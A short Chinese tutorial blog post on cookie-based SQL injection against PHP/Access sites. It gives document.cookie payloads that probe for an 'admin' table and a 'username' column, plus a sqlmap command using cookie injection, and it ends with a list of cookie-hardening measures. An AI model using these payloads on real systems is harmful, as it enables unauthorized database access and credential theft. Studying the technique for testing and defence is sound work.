Access — Cookie注入

注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关!!!

一、Cookie注入简介

此处Cookie注入的条件

        在php中$_REQUEST[]接受传参的时候,接收post、get、cookie传参从而导致cookie注入

        php<5.4        接受cookie传参

二、怎么修改Cookie

        1.抓包修改Cookie值

        2.控制台输入Cookie值

                document.cookie="id="+escape("语句")

                document.cookie        是用来设置cookie的

                Cookie名字为id

                escape        是一个编码函数,这个函数会进行URL编码

        3.F12 -> 储存  -> cookie

三、Cookie注入步骤(Access数据库)

        URL栏接受数据的时候先接受RUL栏中的传参,然后再接收cookie里的传参,所以在注入的时候应该清空URL栏的传参,在回车

方法一:

        不知道表名,我们可以猜admin表是否存在(burp跑sqlmap下的data文的txt)

       document.cookie="id="+escape("666  and  exists( select * from  admin)")

        不知道字段名,我们可以猜username字段是否存在admin表中

        document.cookie="id="+escape("666  and  exists(select  username from admin)")

        找显错位

        document.cookie="id="+escape()

方法二:

        python sqlmap.py  -u  "https://127.0.0.1/xxx.php"  --cookie  "sb=123"  --level 3 -- risk 2

-batch

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
对于确保 cookie安全性,可以采取以下几种解决办法: 1. 使用 HTTPS 协议:通过使用 HTTPS 加密协议来传输请求和响应,可以防止中间人窃听和篡改的风险,确保数据的安全性。 2. 设置 Secure 标记:在设置 cookie 时,使用 Secure 标记来指示浏览器仅在通过 HTTPS 连接发送请求时才发送该 cookie。这可以防止通过非加密连接发送 cookie,提高其安全性。 3. 设置 HttpOnly 标记:在设置 cookie 时,使用 HttpOnly 标记来禁止 JavaScript 访问该 cookie。这可以防止恶意脚本通过 XSS(跨站脚本攻击)获取用户的 cookie,提高其安全性。 4. 设置 SameSite 标记:在设置 cookie 时,使用 SameSite 标记来限制 cookie 的发送范围。可以设置为 "Strict"、"Lax" 或 "None"。Strict 模式下,cookie 仅在与请求网站具有一致性的情况下发送;Lax 模式下,在某些情况下,例如从外部站点链接访问时,也可以发送;None 模式下,始终发送 cookie。这可以防止 CSRF(跨站请求伪造)攻击。 5. 对敏感信息进行加密处理:如果需要在 cookie 中存储敏感信息,应该先对其进行加密处理,确保即使 cookie 被窃取,也无法直接获取敏感信息。 6. 实施访问控制和身份验证:在服务器端实施访问控制和身份验证机制,确保只有经过验证的用户才能访问敏感功能或数据,从而降低 cookie 被利用的风险。 通过采取这些安全措施,可以增加 cookie安全性,减少潜在的攻击风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值